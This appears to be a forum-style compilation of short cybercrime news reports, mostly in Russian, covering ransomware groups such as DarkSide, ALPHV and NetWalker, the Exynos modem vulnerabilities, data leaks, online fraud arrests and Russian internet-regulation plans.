Установлено, что мужчина начал заниматься преступной деятельностью в 2017 году. А с 2021 года перешел в массовый фишинг. По предварительным данным, таким образом он «заработал» минимум 3,5 миллиона гривен. Пострадавшими из-за его действий стали жители Соединенных Штатов Америки и Канады.
Подозреваемому грозит до 8 лет лишения свободы с конфискацией имущества. В настоящее время Винницкий городской суд решает вопрос об избрании меры пресечения в виде содержания под стражей.
Команда Project Zero компании Google рассказала о серьёзных уязвимостях,
представляющих угрозу для смартфонов с модемами Exynos, используемыми во
флагманах Pixel 6 и 7, а также во многих смартфонах Samsung, Vivo и многих
носимых устройствах, в первую очередь — смарт-часах. E их пользователей есть
возможность защитить информацию до обновления ПО, но не у всех.
Источник изображения: SCREEN POST/unsplash.com
В Project Zero выявили 18 уязвимостей, связанных с модемами Exynos, в конце 2022 и начале 2023 годов. Четыре из них, включая CVE-2023-24033, позволяют злоумышленникам удалённо выполнять код на устройствах пользователей, компрометируя телефоны без их участия — достаточно знать номер жертвы. В Google считают, что квалифицированные организаторы атак смогут быстро создать рабочее решение для использования в неблаговидных целях.
Ещё 14 уязвимостей являются не столь критическими и требуют либо участия недобросовестного оператора мобильной сети, либо «локального» доступа злоумышленника к устройству. В Project Zero сообщили, что сделали исключение из политики задержки раскрытия данных об уязвимостях из-за уровня угрозы и скорости, с которой злоумышленники в принципе могут создать действующий эксплойт. По данным Samsung на январь 2023 года, проблема касается чипов Exynos Modem 5123, Exynos Modem 5300, Exynos 980, Exynos 1080 и Exynos Auto T5123. Google составила список уязвимых продуктов:
Помимо Pixel 6 (Exynos 5123) и Pixel 7 (Exynos 5300), речь идёт о флагмане Galaxy S22 и Galaxy Watch 4 и 5. На некоторых смартфонах Pixel основная уязвимость CVE-2023-24033 уже устранена мартовской «заплаткой» системы безопасности, вышедшей в понедельник. Впрочем, Pixel 6, 6 Pro и 6a ещё не получили мартовского обновления и, как сообщает портал 9to5google, уязвимы до сих пор.
В Project Zero советуют временно, до обновления ПО во всех уязвимых смартфонах, защитить себя, отключив вызовы по Wi-Fi и Voice-over-LTE (VoLTE). Правда, по данным Sprint/T-Mobile, в смартфонах Google Pixel благодаря обновлениям 2021 года VoLTE активируется автоматически и отключить его обычными средствами невозможно, но можно отключить функцию в моделях других брендов.
Источник: [https://3dnews.ru/1083552/google-re...ometirovat-gadgeti-bez- uchastiya-polzovateley](https://3dnews.ru/1083552/google-rekomenduet- otklyuchit-nekotorie-funktsii-smartfonov-i-chasov-uyazvimosti-pozvolyayut- komprometirovat-gadgeti-bez-uchastiya-polzovateley)
Злоумышленник был арестован в Майами. Его обвиняют в продаже поддельных устройств на 1 миллиард долларов.
Онур Аксой (также известный под именами Рон Аксой и Дэйв Дерден) управлял 19 компаниями в Нью-Джерси и Флориде, 15 магазинами в Amazon, а также 10 магазинами в eBay и множеством других организаций. Эта сеть магазинов и организаций использовались для импорта десятков тысяч поддельных сетевых устройств Cisco из Китая и Гонконга, после чего продавались в США и за рубежом. При этом, все товары рекламировались как оригинальные и новые. За все свои махинации Аксой смог заработать миллионы долларов, а общий доход превысил 100 миллионов долларов.
Устройства, которые злоумышленники выдавали за новые, были старыми моделями с неофициальными модификациями, к которым были приклеены оригинальные этикетки и приложена официальная документация
"Китайские контрафакторы устанавливали на устройства пиратское ПО и ненадежные компоненты, которое используются для обхода проверки подлинности ПО и оборудования", – поясняется в судебном пресс-релизе .
Специалисты отмечают, что эти устройства были крайне уязвимы с точки зрения безопасности, показывали плохую производительность и часто выходили из строя, хотя использовались в больницах, школах, правительственных и военных учреждениях.
29 июня 2022 г. Аксою были предъявлены в обвинения по одному пункту в сговоре с целью торговли контрафактными товарами и совершении мошенничества с использованием почты и телеграфных средств; по трем пунктам мошенничества с использованием почты; по четырем пунктам мошенничества с использованием электронных средств связи; по трем пунктам в торговле контрафактными товарами. Мошенник был арестован в тот же день.
source: justice[.]gov/opa/pr/ceo-dozens-companies-and-entities-charged-scheme- traffic-estimated-1-billion-fraudulent-and
Злоумышленники способны осуществлять DDoS-атаки против жертв, не желающих платить выкуп.
На прошлой неделе операторы вымогательского ПО DarkSide совершили кибератаку на крупнейшую компанию-оператора трубопровода для нефтепродуктов в США Colonial Pipeline. ИБ-фирмы и исследователи в области кибербезопасности поделились информацией о группировке, ответственной за инцидент.
Операторы DarkSide действуют по бизнес-модели «вымогательское-ПО-как-услуга» (RaaS), в рамках которой их клиенты могут распространять вредоносное ПО в обмен на процент от суммы выкупа. На сегодняшний день выявлено не менее пяти русскоязычных партнеров DarkSide.
Группировка DarkSide ведет блог в сети Tor, где хвастается взломанными организациями. Злоумышленники способны осуществлять атаки типа «отказ в обслуживании» (DDoS) против жертв, не желающих платить выкуп.
Жертвам предоставляется возможность напрямую договариваться о выплате выкупа с преступниками. В одном случае злоумышленники потребовали выкуп в размере $30 млн, но после переговоров жертве удалось снизить сумму до $11 млн. Хакеры также пообещали удалить все украденные данные и больше не нападать на сеть компании.
По словам исследователей в области безопасности из компании Intel 471, для первоначального доступа злоумышленники используют учетные данные, приобретенные на подпольных форумах, брутфорс-атаки и рассылку спама по электронной почте для распространения вредоносного ПО. В таких атаках использовалась как минимум одна уязвимость нулевого дня.
Инструменты постэксплуатации, используемые в атаках DarkSide, могут включать Cobalt Strike, Metasploit, BloodHound, Mimikatz, фреймворк Custom Command and Control (C3) F-Secure Labs, TeamViewer, бэкдор SMOKEDHAM и утилиту NGROK.
Один из партнеров группировки устанавливает программу-вымогатель только через три дня после первоначального взлома, а другой имеет тенденцию скрываться в скомпрометированных сетях в течение месяцев, прежде чем сделать аналогичный шаг.
Во вторник, 11 мая, Агентство по кибербезопасности и безопасности инфраструктуры США (CISA) и ФБР выпустили предупреждение , призванное помочь организациям не стать жертвой атак программ-вымогателей DarkSide.
По данным МВД Беларуси, оперативники отделения по противодействию киберпреступности Заводского РУВД задержали 29-летнего минчанина, установившего в своей квартире специальное оборудование. Им в своих целях пользовались преступники. Сейчас в милиции проводится проверка.
Как следует из комментария начальника ОПК Заводского РУВД Минска, задержанный минчанин установил в своей квартире 3 сим-бокса для обслуживания 32 сим-карт. Одно такое устройство позволяло одновременно совершать до 60 звонков и отправлять до 600 сообщений в час. Этим оборудованием дистанционно пользовались мошенники, которые звонили белорусам с целью хищения денег под различными предлогами.
В милиции сообщают, что за размещение такого оборудования в своей квартире минчанин ежемесячно получал более 150 рублей. По словам задержанного, о том, что сим-боксы используют мошенники, он узнал от сотрудников милиции.
• Video: https://t.me/pressmvd/12673
С 1 марта вступает в силу запрет на популяризацию VPN-сервисов.
Как сообщает ТАСС, что средства обхода блокировок в РФ запрещены, с 1 марта вступит в силу запрет на популяризацию таких сервисов.
«В соответствии с законодательством в России запрещена работа средств обхода блокировок доступа к противоправному контенту с февраля 2020 года. VPN- сервисы относятся к таким средствам, если при их использовании не ограничивается доступ к запрещенным ресурсам» - говорится в сообщении.
Click to expand...
С 1 марта 2024 года вводится норма, ограничивающая доступ к материалам, которые популяризируют подобные средства.
Специалисты в области IT и соответствующие органы власти обсуждают внедрение новой технологии в РФ.
В перспективе для доступа к защищенному интернету потребуется регистрация по паспорту. Пользователь получит уникальный код.
Об этом в эфире радиостанции «Говорит Москва» рассказал заместитель председателя комитета Госдумы по информационной политике, информационным технологиям и связи Андрей Свинцов.
Как считает Свинцов, в скором времени мы придем к тому, что нам выгоднее иметь абсолютно прозрачный интернет. Будет какой-то личный идентификатор, который будет указывать на то, кто скрывается за этим аккаунтом. Будет присваиваться определенный код, через который спецслужбы всегда смогут определить владельца этого аккаунта.
По его словам, после консультаций с экспертами МГУ Минцифры, нам придется изменить технологию интернета. Сегодняшняя технология, когда есть возможность подключаться к сети с анонимных устройств, будет заменена. Это будет выглядеть так: вы попадаете в защищенный интернет только после предварительной регистрации в нем. Вы регистрируетесь по паспорту, получаете аналог доменного имени и с этим идентификатором вы с любой точки мира заходите в защищенную часть интернета. Будет единый оператор, который управляет всеми нашими персональными данными.
При этом Свинцов отметил, что незащищенный интернет тоже останется, но ответственность за свои персональные данные будут нести сами пользователи.
Ранее депутат Александр Хинштейн заявил, что весь негативный контент можно убрать из сети только в случае организации работы «интернета по паспорту», тем самым сделав его абсолютно безопасным.
Интернет по паспорту — это не новая идея, которая уже реализована или обсуждается в некоторых странах мира. Например, в Китае существует система социального кредита, которая связывает онлайн-активность граждан с их личными данными и оценивает их поведение по разным критериям.
В Индии существует проект Aadhaar, который предоставляет каждому гражданину уникальный 12-значный идентификационный номер, связанный с его биометрическими данными, такими как отпечатки пальцев и сканы радужки глаза. Этот номер используется для доступа к различным государственным и частным услугам, включая банковские счета, мобильную связь и интернет. Однако проект сталкивается с критикой за нарушение права на конфиденциальность и за уязвимость к хакерским атакам.
В Иране существует система «белого интернета», которая позволяет гражданам получать доступ к определенным сайтам, одобренным правительством, без необходимости использовать VPN или прокси-серверы. Для регистрации в этой системе пользователи должны предоставить свои личные данные, включая номер паспорта, адрес электронной почты и номер телефона. Правозащитные организации критикуют эту систему за ограничение свободы информации и за возможность слежки за онлайн-активностью граждан.
Целью таких технологий является повышение безопасности, борьба с терроризмом, преступностью и мошенничеством, а также улучшение качества государственных услуг. Однако они также несут в себе риски для прав человека, свободы слова и личной конфиденциальности. Возникают вопросы о том, как защищать данные граждан от утечек, злоупотреблений и хакерских атак, как контролировать действия государственных органов и частных компаний, которые имеют доступ к этим данным, как обеспечить соблюдение принципов прозрачности, справедливости и ответственности при использовании таких технологий.
Поэтому важно, чтобы внедрение интернета по паспорту в РФ было сопровождено широким общественным диалогом, учетом международных стандартов и лучших практик, а также разработкой нормативно-правовой базы, которая бы гарантировала защиту прав и интересов граждан в цифровой среде.
190 ГБ слитых данных.
В канадской сети транспортировки нефти Trans-Northern Pipelines зафиксирована угроза безопасности, вызвавшая переполох и обеспокоенность во всей отрасли: вымогательская группировка ALPHV, также известная как BlackCat, объявила о взломе систем компании и краже из них 190 ГБ конфиденциальных данных.
Нефтегазовый концерн Trans-Northern Pipelines является крупным оператором нефтепроводов в Онтарио, Квебеке и Альберте. Похищенные файлы, по утверждениям злоумышленников, содержат «всю важную информацию», а за непубликацию, как это водится, вымогатели хотят крупную сумму денег.
Инцидент во многом схож с атакой на Colonial Pipeline в 2021 году, которая привела к серьёзным последствиям в виде дефицита топлива на восточном побережье США. Эксперты подчёркивают связь между ALPHV и другими известными вымогательскими группировками, такими как BlackMatter и Darkside, указывая на углубление проблемы безопасности в секторе критической инфраструктуры.
Сам киберинцидент, со слов официального представителя Trans-Northern Pipelines, произошёл ещё в ноябре 2023 года и затронул ограниченное количество внутренних компьютерных систем. Сейчас компания сотрудничает с внешними экспертами по безопасности для расследования заявлений хакеров и обеспечения надлежащей защиты своих операций.
Возникшая ситуация ставит перед правительствами и организациями по всему миру задачу по разработке новых методов цифровой обороны критической инфраструктуры.
С учётом растущей глобальной угрозы кибератак для предотвращения потенциальной катастрофы необходима исключительно скоординированная работа десятков разных ведомств и организаций.
sc: twitter.com/BrettCallow/status/1757439621582201299
Сбежавшая за границу сотрудница Ведомства загрузила вирус в систему, который уничтожил множество ценной информации.
По подозрению в атаке на IT-систему Росавиации разыскивается бывшая сотрудница ведомства с паспортом Украины. По предварительным данным, она намеренно заразила вирусом рабочий компьютер, из-за чего система вышла из строя, и гигабайты ценной информации были уничтожены. После кибердиверсии подозреваемая покинула Россию.
События развивались следующим образом: в начале 2022 года за 2 месяца до сбоя серверов в Росавиацию на должность в Департамент по цифровизации пришла женщина по имени Ева (имя изменено). Примечательно то, что новая сотрудница не проходила каких-либо строгих проверок, и её документы не были отправлены на проверку. Руководителем Департамента тогда была Алла Сясина.
Спустя 2 месяца в конце марта Ева внезапно написала заявление об увольнении из Росавиации по личным обстоятельствам. Через несколько дней, 26 марта сервера Росавиации вышли из строя. Расследование инцидента показало, что у женщины было двойное гражданство – России и Украины, после ухода она уехала в Беларусь, а далее её след пропал.
Сообщение Александра Нерадько об инциденте
Затем на фоне громкого скандала заявление об уходе написала и руководитель Департамента Росавиации по Цифровизации — Алла Сясина. По словам главы Ведомства Александра Нерадько, в результате атаки на систему Росавиации пришлось временно перейти «на бумагу» и пытаться восстанавливать данные (некоторые из них удалены безвозвратно). На данный момент выясняются все детали кибердиверсии и все причастные к ней.
source: t.me/shot_shot/37079
Испания экстрадирует подозреваемого хакера в США. Подозреваемый хакер, предположительно, также был автором атак на главу Microsoft Билла Гейтса и владельца Twitter Элона Маска несколько лет назад.
Молодой британец, обвиняемый, в частности, в взломе учетных записей Twitter различных личностей, экстрадирован Испанией в США. Среди его предполагаемых жертв были бывшие президенты США Джо Байден и Барак Обама, а также основатель Microsoft Билл Гейтс и нынешний владелец Twitter Элон Маск. Национальный суд Мадрида отклонил апелляцию 23-летнего молодого человека против решения об экстрадиции от 8 февраля 2023 года, сообщила испанская правосудная система.
golem(.)de/news/cyberattacken-auf-biden-und-obama-spanien-liefert- mutmasslichen-hacker-an-usa-aus-2303-172997.html
Мошенники переоделись в медведей и пошли царапать дорогие тачки в Лос- Анджелесе.
Они хотели обмануть страховую и получить 140 000$, но камера испортила всю идиллию — арестованы 4 армянина и еврейка.
Рубен Тамразян, Арарат Чиркинян, Ваге Мурадханян и Альфия Цукерман сообщили своим страховщикам, что на их машины Mercedes и Rolls Royce напал косолапый. Видео компания также предоставила. Планировалось, что им выплатят компенсацию в размере 140 тысяч долларов, но детективы по борьбе с мошенничеством департамента страхования пригласили биолога.
insurance.ca.gov/0400-news/0100-press- releases/2024/release056-2024.cfm?fbclid=PAZXh0bgNhZW0CMTEAAaYaVLU1NVNSpANK4yyroPy91pIMZA4srsqKMDPhxTXr- rLJrPtkuK44y8M_aem_rCtyEQzfptZx106jhV1dDw
Несмотря на мощное шифрование, пользователи по-прежнему уязвимы для правительственного надзора. Эксперты предупреждают о возможностях обхода шифрования для отслеживания пользователей мобильного приложения. Эти атаки требуют, чтобы все члены группы WhatsApp или обе стороны разговора находились в одной сети и в пределах одной страны или договорной юрисдикции.
Уязвимость в мессенджере
В марте 2024 г. команда безопасности WhatsApp сообщила о серьезной угрозе для пользователей мессенджера. Внутренний документ, полученный изданием The Intercept, утверждает, что содержание переписок 2 млрд пользователей остается защищенным, но правительственные агентства могут обходить данную защиту.
Уязвимость основана на анализе трафика, используемом десятилетиями методе сетевого мониторинга, и на изучении интернет-трафика в масштабах всей страны. Из документа ясно следует, что WhatsApp не единственная уязвимая платформа для обмена сообщениями. Но это говорит о том, что владелец WhatsApp, компания Meta* (компания признана экстремистской организацией на территории России), должен быстро решить, что является приоритетом. Владельцы ИТ-компании должны выбрать из функциональности чат-приложения или безопасности пользователей WhatsApp.
В анализе отмечается, что правительство может легко определить, когда человек использует WhatsApp, отчасти потому, что данные должны проходить через легко идентифицируемые корпоративные серверы. Затем правительственное учреждение может раскрыть конкретных пользователей, отслеживая их IP-адрес и учетную запись интернет-провайдера или поставщика услуг сотовой связи.
Команда внутренней безопасности WhatsApp выявила несколько примеров того, как умелое наблюдение за зашифрованными данными может вызвать корреляционную атаку. В одном случае пользователь отправляет сообщение группе, в результате чего на устройства всех членов этой группы передается пакет данных одинакового размера. Другая корреляционная атака предполагает измерение временной задержки между отправкой и получением сообщений в мессенджере между двумя сторонами. Это позволяет определить расстояние и, возможно, местоположение каждого получателя.
Из документа следует, что WhatsApp должен снизить уровень использования уязвимостей анализа трафика, которые позволяют национальным государствам определять, кто с кем разговаривает. Отчет не приводит конкретных примеров использования этого метода государственными органами, но ссылается на отчеты New York Times и Amnesty International, которые наглядно показывают, как государства следят за использованием зашифрованных приложений для обмена сообщениями.
Ответ от владельцев WhatsApp
«В WhatsApp нет бэкдоров, и у нас нет доказательств наличия уязвимостей в работе WhatsApp», - заявила представитель Meta Кристина Лонигро (Christina LoNigro).
Хотя в отчете об оценке уязвимости описаны как текущие и, в частности, WhatsApp упоминается 17 раз, Лонигро сообщила, что документ не отражает уязвимость в WhatsApp, а является теоретическим и не уникальным для WhatsApp. ЛоНигро не ответила на вопрос The Intercept, расследовала ли компания Meta данную уязвимость.
Решение проблем несколько, но нужен выбор
Инженеры WhatsApp признают серьезность проблемы, но изо всех сил пытаются найти решение, обеспечивающее баланс между производительностью, функциональностью и конфиденциальностью. Эта сложность возникает из-за необходимости обеспечить высокую скорость обработки и бесперебойную функциональность платформы, а также поддерживать максимальный уровень защиты и конфиденциальности пользовательских данных.
Похоже, что возможность искусственной задержки отправки сообщений затронет всех пользователей, а отправка потока поддельных данных для маскировки реальных разговоров потенциально может отпугнуть правительства. Кроме того, это может привести к сокращению времени автономной работы и увеличению счетов за мобильную связь, что вызывает серьезные опасения.
Служба безопасности WhatsApp рассматривает возможность введения более строгого режима безопасности для пользователей из групп повышенного риска, аналогичного режиму карантина у Apple под названием «lockdown mode» для устройств iOS. Однако это также может быть сопряжено с риском, поскольку государственные правительства, вероятно, смогут выявлять таких пользователей и воздействовать на них еще более эффективно.
Правительственная слежка
Аналитический центр The Century Foundation провел исследование о том, что показывают метаданные. Исследователи смогли показать, что метаданные можно собирать, анализировать и легко интерпретировать для определения религиозной принадлежности, состояния здоровья, владения оружием, употребления наркотиков и даже незапланированной беременности.
В первой половине 2020 г. крупные технологические компании, такие как Apple, Google, Facebook и Microsoft, получили более 112 тыс. запросов данных от местных лишь в США, государственных и федеральных чиновников. Компании выполнили 85% этих запросов, с радостью передав личную информацию о своих пользователях.
В 2021 г. произошла даже утечка правительственных документов США, показывающая, что действует программа отслеживания текстовых сообщений и метаданных журналистов и защитников иммиграции. В то время аналитик из The Century Foundation Роберт Браун (Robert Brown) посоветовал пользователям задуматься об этом на минутку. Ведь американское правительство, которое любит рассуждать на то, насколько оно свободно, активно строит внутри себя информационный концлагерь.
Hotel booking site Booking.com got hit with a €475,000 fine for being late to report a data breach, the company’s lead EU privacy regulator announced Wednesday.
The fine, imposed by the Dutch data protection authority because the company is legally established in Amsterdam, came after criminals stole the personal data of more than 4,000 Booking.com customers — obtaining the credit card details of nearly 300 victims.
The website received the penalty for missing a 72-hour deadline to report the breach to the regulator, which it did on February 4, 2019 — almost a month after it suffered the breach.
Хакер под ником IntelBroker заявил на BreachForums, что похитил у компании Apple исходный код нескольких внутренних инструментов.
Согласно опубликованному злоумышленником сообщению, «в июне 2024 года у
Apple.com произошла утечка данных» (к которой хакер, вероятно, был причастен),
что и привело к раскрытию информации. IntelBroker утверждает, что в результате
он заполучил исходный код для следующих внутренних инструментов компании:
AppleConnect-SSO, Apple-HWE-Confluence-Advanced и AppleMacroPlugin.
Как отмечает издание 9to5Mac, об инструментах Apple-HWE-Confluence-Advanced и
AppleMacroPlugin известно мало. Зато AppleConnect-SSO — это система
аутентификации, которая позволяет сотрудникам получать доступ к определенным
приложениям в сети Apple. Известно, что эта система интегрирована с базой
данных Directory Services, что обеспечивает безопасный доступ к внутренним
ресурсам.
Так, iOS-приложения, предназначенные только для сотрудников, используют
AppleConnect-SSO для быстрой и безопасной аутентификации. Бывший сотрудник
розничной сети Apple рассказал журналистам, что AppleConnect служит для
сотрудников эквивалентом Apple ID и используется для доступа ко всем
внутренним системам, за исключением электронной почты. Инструмент интегрирован
во множество внутренних сервисов, используемых сотрудниками Apple Store,
включая Concierge, EasyPay и MobileGenius, а также сайты AppleWeb и PeopleWeb
и так далее.
Издание подчеркивает, что предполагаемая утечка явно локализована внутри
компании и вряд ли затрагивает данные клиентов Apple.
В своем сообщении IntelBroker не раскрывает никакой дополнительной информации.
Судя по всему, он намерен продать предположительно украденные у компании
данные.
Напомним, что в последнее время IntelBroker регулярно сливает данные,
похищенные у целого ряда правительственных учреждений США, включая Госдеп,
Министерство обороны и армии США, а также Иммиграционную и таможенную полицию
(ICE) и Службу гражданства и иммиграции США (USCIS).
Кроме того, ранее IntelBroker связывали с другими громкими инцидентами,
включая утечку данных, затронувшую членов и сотрудников Палаты представителей
США (нижняя палата Конгресса США), взлом Hewlett Packard Enterprise (HPE),
утечку данных General Electric, утечку данных разведывательного альянса Five
Eye и так далее.
В прошлом месяце именно IntelBroker и вовсе заявил о взломе портала Europol
Platform for Experts (EPE), утверждая, что похитил у Европола документы под
грифом «Только для служебного пользования», а также документы, содержащие
секретные данные. Вскоре после этого хакерский форум BreachForums, на котором
данные были выставлены на продажу, уже во второй раз попытались закрыть
правоохранители, однако вскоре сайт возобновил работу.
Службы безопасности разоблачили в Киеве подпольный цех по изготовлению и продаже поддельных документов, печатей и штампов Украины и Евросоюза.
Установлено, что организатор незаконного бизнеса предлагал своим клиентам фальшивые паспорта, водительские удостоверения, свидетельства о регистрации транспортных средств, а также акты права собственности на землю.
Кроме того, он продавал фиктивные дипломы об окончании высших учебных заведений Украины.
Готовую фальшивую продукцию продавал через хакерскую платформу «Darknet».
Стоимость подделки составляла от 300 до 7 тыс. долл. Сумма зависела от сложности документа и срочности его изготовления.
Ежемесячно обороты нелегальной «мастерской» достигали до 50 и более «документов».
По данным следствия, незаконную деятельность организовал столичный предприниматель. «Производственные мощности» обустроил в заранее арендованной для этого квартире.
Среди основных клиентов злоумышленника были уклоны и лица из хакерской среды, которые использовали фальшивки для прикрытия противоправной деятельности.
Во время обысков в подпольном цехе обнаружено:
инструменты и оборудование для изготовления поддельной документации;
Мобильные телефоны и компьютеры с доказательствами преступных действий.
На основании собранных доказательств злоумышленнику сообщено о подозрении по двум статьям Уголовного кодекса Украины:
ч. 1 ст. 199 (изготовление, хранение, приобретение, перевозка, пересылка, ввоз в Украину с целью использования при продаже товаров, сбыта или сбыт поддельных денег, государственных ценных бумаг, существующих в бумажной форме, билетов государственной лотереи, марок акцизного налога или голографических защитных элементов);
ч. 3 ст. 358 (подделка документов, печатей, штампов и бланков, сбыт или использование поддельных документов, печатей, штампов).
Решается вопрос об избрании меры пресечения. Продолжается расследование для установления всех обстоятельств преступления. Злоумышленнику грозит до 7 лет тюрьмы.
В Санкт-Петербурге в результате реализации оперативной информации сотрудники полиции задержали пятерых местный жителей, которые на протяжении последних четырёх лет занимались обманом покупателей интернет-магазинов.
По версии полиции, мошенническую схему разработали двое 32-летних сообщников. Для реализации задуманного они привлекли ещё троих подельников: 29-летнего разработчика сайтов, 30-летнего специалиста по размещению и продвижению рекламы и 35-летнего закупщика оптовых партий товаров.
Члены организованной группы создали более 70 онлайн-маркетов, специализирующихся на продажах якобы качественной текстильной продукции и цифровой техники. В реальности одежда и бельё отшивались кустарным способом из низкосортного сырья в цехах, расположенных на территории Москвы и Московской области, а также в городе Иваново, а вместо дорогих электронных устройств соучастники приобретали дешёвые аналоги у посредников из различных регионов России.
Рекламируя свои сайты в социальных сетях, аферисты завлекали пользователей низкими ценами и высокими скидками в случае приобретения сразу нескольких изделий. Средний чек составлял от 4 до 5 тысяч рублей.
Доставка приобретённых товаров осуществлялась только после её полной оплаты. Однако, вскрыв полученную посылку, заказчик обнаруживал лишь несколько тряпок себестоимостью от 200 до 300 рублей или же гаджеты, которые не соответствовали заявленным характеристикам либо вовсе не работали. Кроме этого, злоумышленники клали в упаковки пакеты с песком или землёй, а после их отправки переставали выходить на связь.
В ходе проведения обысков в квартирах задержанных и арендуемых ими офисах полицейскими изъяты денежные средства в размере порядка 2 миллионов рублей, компьютерная техника с базами данных клиентов и мешки с образцами продаваемой продукции.
Установлена причастность сообщников к обману четверых жителей Санкт- Петербурга. По всем фактам возбуждены уголовные дела по части 4 статьи 159 Уголовного кодекса Российской Федерации. Кроме того, у следователей имеются основания полагать, что от действий интернет-мошенников пострадали около 150 человек из 30 регионов России. Расследование продолжается.
Математика Артема Хорошилова обвиняют в компьютерных атаках (DDos-атаках) на объекты критической информационной инфраструктуры страны. Об этом сообщили ТАСС в правоохранительных органах.
Из материалов суда следует, что Хорошилова арестовали 13 декабря прошлого года, 23 января ему продлили арест. Отмечается, что Хорошилову предъявили обвинение в неправомерном воздействии на критическую информационную инфраструктуру России.
Информацию об аресте Хорошилова подтвердили и в пресс-службе московских судов общей юрисдикции. Так, суд продлил его арест за кибератаки на объекты критической информационной инфраструктуры страны на три месяца – до 12 мая.
"Постановлением Лефортовского районного суда города Москвы Хорошилову Артёму Леонидовичу продлена мера пресечения в виде заключения под стражу на срок 3 месяца, то есть до 12 мая 2024 года", – отмечается в заявлении.
Как сообщало ИА Регнум
Артём Хорошилов, арестованный в Москве по делу о DDOS-атаках на объекты критической информационной инфраструктуры, давно состоит в украинских чатах, администраторы которых финансируют ВСУ.
Создатели этих чатов в Telegram открыто призывают отправлять деньги на нужды украинской армии. В описании к их YouTube-каналу содержится призыв делать «больше донатов для ВСУ», чтобы ролики на нём выходили чаще.
«Также Хорошилов состоит в чатах, которые посвящены лайфхакам по переводу денег из-за границы в Россию и в обратном направлении», — сообщил источник.
Математику 33 года, он окончил один из столичных физико-технических вузов и занимался частной преподавательской деятельностью. В частности, математик готовил школьников к олимпиадам.
В Канаде закончился судебный процесс по делу о вымогательстве с использованием программы-шифровальщика NetWalker. Ответчика Себастьяна Вашон-Дежардена (Sebastien Vachon-Desjardins) признали виновным и отправили за решетку на семь лет.
Ныне осужденного арестовали год назад в ходе трансграничной операции, направленной на пресечение деятельности ОПГ, стоящей за NetWalker. На суде канадец признал свою вину по всем вменяемым ему эпизодам вымогательства, взлома компьютеров, кражи данных в составе преступной группы.
Согласно решению суда, которое раздобыл репортер The Record, Вашон-Дежарден состоял в партнерских отношениях с владельцами RaaS-сервиса (Ransomware-as-a- Service, вымогатель как услуга). Атаки с использованием NetWalker этот аффилиат проводил с мая 2020 года вплоть до ареста и совокупно выманил у своих жертв более 2000 биткоинов в качестве выкупа. Из них 1200 он оставил себе, остальное отдал создателям зловреда. Канадец также учил новичков проводить вымогательские атаки и помогал авторам NetWalker совершенствовать RaaS-сервис — в частности, посоветовал подписаться на услуги по отмыванию криптовалюты (миксинг).
В ходе обыска полиция обнаружила на компьютерах Вашон-Дежардена более 20 Тбайт данных, украденных у жертв с целью оказать на них дополнительное давление (заставить платить под угрозой публикации). В доме было также найдено много наличных — результаты обмена биткоинов, полученных в качестве выкупа.
По оценкам властей, за неполные девять месяцев NetWalker принес пользователю RaaS-сервиса свыше CAD$30 миллионов. В Канаде удалось идентифицировать 17 жертв заражения, совокупно потерявших CAD$2,8 млн. Восьми из них уже определили сумму компенсации, которую преступнику придется выплатить.
Хотя арест вымогателя был произведен по запросу ФБР США, судили его на родине: он там в это время находился под следствием по делу о контрабанде наркотиков. За это преступление его наказали лишением свободы на 4,5 года — как рецидивиста (в 2015 году за аналогичный проступок канадец получил 3,5 года).
Примечательно, что с криминалом Вашон-Дежарден связался отнюдь не из-за нехватки легальных способов заработка. В деле о NetWalker отмечено, что фигурант четыре года работал айтишником в правительстве Канады.
source: therecord.media/netwalker-ransomware-affiliate-sentenced-to-seven- years-in-prison documentcloud.org/documents/21199313-sebastien-vachon- desjardins-guilty-plea-sentencing
Фигурант создал вредоносное программное обеспечение предназначенное для автоматического подбора паролей пользователей различных ресурсов. Данные скомпрометированных учетных записей он формировал в базы, которые продавал на хакерских форумах. За содеянное мужчине может грозить до восьми лет за решеткой.
19-летнего молодого человека, который создал для противоправного использования вредоносное программное обеспечение, разоблачили сотрудники киберполиции Днепропетровщины совместно со следователями ГУНП области и работниками Правобережной окружной прокуратуры Днепра.
Принцип действия разработки фигуранта заключался в подборе учетных данных методом brute force. Специализировался мужчина на получении доступа к аккаунтам сервисов электронной почты, торговых, рекламных, медийных ресурсов. Данные он проверял на соответствие, формировал в базы и продавал на хакерских форумах.
Во время обыска в доме правонарушителя киберполицейские обнаружили скомпрометированную конфиденциальную информацию более миллиона учетных записей граждан Украины.
Фигуранту объявили подозрение по ч. 3 ст. 361 (Несанкционированное вмешательство в работу информационных (автоматизированных), электронных коммуникационных, информационно-коммуникационных систем, электронных коммуникационных сетей), ч. 1 ст. 361-1 (Создание с целью противоправного использования, распространения или сбыта вредоносных программных или технических средств, а также их распространения или сбыта Подозреваемому может грозить от трех до восьми лет лишения свободы.
Правоохранители завершили досудебное расследование, обвинительный акт направлен в суд.
Одна из крупнейших строительных компаний Японии Kajima Construction
Corporation предположительно стала жертвой вымогательской группировки REvil.
Корпорация Kajima занимается строительством высотных сооружений, железных
дорог, электростанций, дамб и мостов. Компания имеет подразделения по всему
миру, а список ее клиентов включает Disney, Universal, Pfizer, Marriott и пр.
Согласно сообщению на сайте REvil в даркнете, группировка похитила в общей
сложности 1 300 000 файлов, принадлежащих компании, в том числе
конфиденциальные контракты и чертежи. В качестве доказательства, вымогатели
опубликовали ряд скриншотов документов, якобы похищенных у компании.
Группировка REvil также предупредила, что «проводит переговоры о продаже
конфиденциальных чертежей и терабайтов персональных данных с крупными
брендами», и предложила Kajima выкупить данные до 1 мая нынешнего года.
Сумма выкупа на сайте не указывается.
Киберполицейские Хмельницкой области совместно со следователями ГУНП и сотрудниками Управления СБУ в области при процессуальном руководстве Хмельницкой областной прокуратуры прекратили деятельность онлайн-сервиса, который предоставлял доступ к сайтам страны-агрессора в обход санкционных ограничений СНБО.
"Правоохранители установили 28-летнего хакера-самоучку из города Хмельницкий, который вскоре после начала полномасштабного вторжения рф организовал незаконную деятельность VPN-сервиса. «Стартап» позволял в обход санкций СНБО получать доступ к более 48 млн ИР-адресов российского сегмента интернета. По данным следствия, ежедневный объем сетевого трафика превышал 100 гигабайт. Для настройки интернет-трафика с временно оккупированными территориями Украины и регионами рф фигурант оборудовал автономное серверное помещение в своей квартире ", - сообщает полиция Хмельницкой области.
Кроме этого злоумышленник арендовал серверы, размещенные на территории Германии, Франции, Нидерландов и РФ. Благодаря этому спецслужбы врага имели техническую возможность доступа к информации обо всех пользователях VPN- сервиса.
Свой сервис мужчина рекламировал в собственных телеграм-каналах и тематических сообществах, а также на всемирно известном ИТ-ресурсе, где позиционировал себя в качестве разработчика проектов и подыскивал единомышленников.
